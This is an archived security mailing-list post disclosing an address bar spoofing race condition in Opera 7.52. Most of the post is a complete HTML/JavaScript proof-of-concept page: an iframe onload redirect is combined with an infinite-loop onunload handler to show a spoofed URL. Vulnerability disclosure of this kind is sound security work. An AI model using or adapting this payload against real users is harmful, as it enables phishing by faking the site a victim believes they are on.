lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY1-F30mz6UuEhjJ8u0001795b@hotmail.com>
From: bitlance_3 at hotmail.com (bitlance winter)
Subject: Opera 7.52 (Build 3834) Address Bar Spoofing Issue

Hi List.

A vulnerability is found in the Opera browser version 7.52 , which 
potentially
can be exploited by malicious people to conduct phishing attacks against a 
user.

The issue may be caused due to a race condition and will sometimes
make it possible to display spoofed information in the address bar
via a specially crafted HTML document.

Tested on WindowsXP SP1.

Demonstration HTML source code:

======== begin ========

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
[style type="text/css"]
[!-- /* begin */
  h1 { font-size:120%;}
  h2 { font-size:100%;}
/* end */ --]
[/style]
[script type="text/javascript"]
[!--
function urlfake(){
location.href="http://www.microsoft.com/";
}
function preinline () {
myvar = '[iframe onload="urlfake()" ';
myvar = myvar +  'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/" ';
myvar = myvar +  'frameborder="0" width="760" height="1800" ';
myvar = myvar +  'marginwidth="0" marginheight="0"]';
myvar = myvar +  '[' + '/iframe]';
document.write (myvar);
}
// --]
[/script]
[/head]
[body onunload="while(1){};"]
[h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
[h2]Tested on WindowsXP SP1[/h2]
[p]
[script type="text/javascript"]
[!--
preinline ();
// --]
[/script]
[/p]
[/body]
[/html]
========= end =========
(Sorry,too long code.)

Thank you, List.

--
bitlance winter

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar – get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ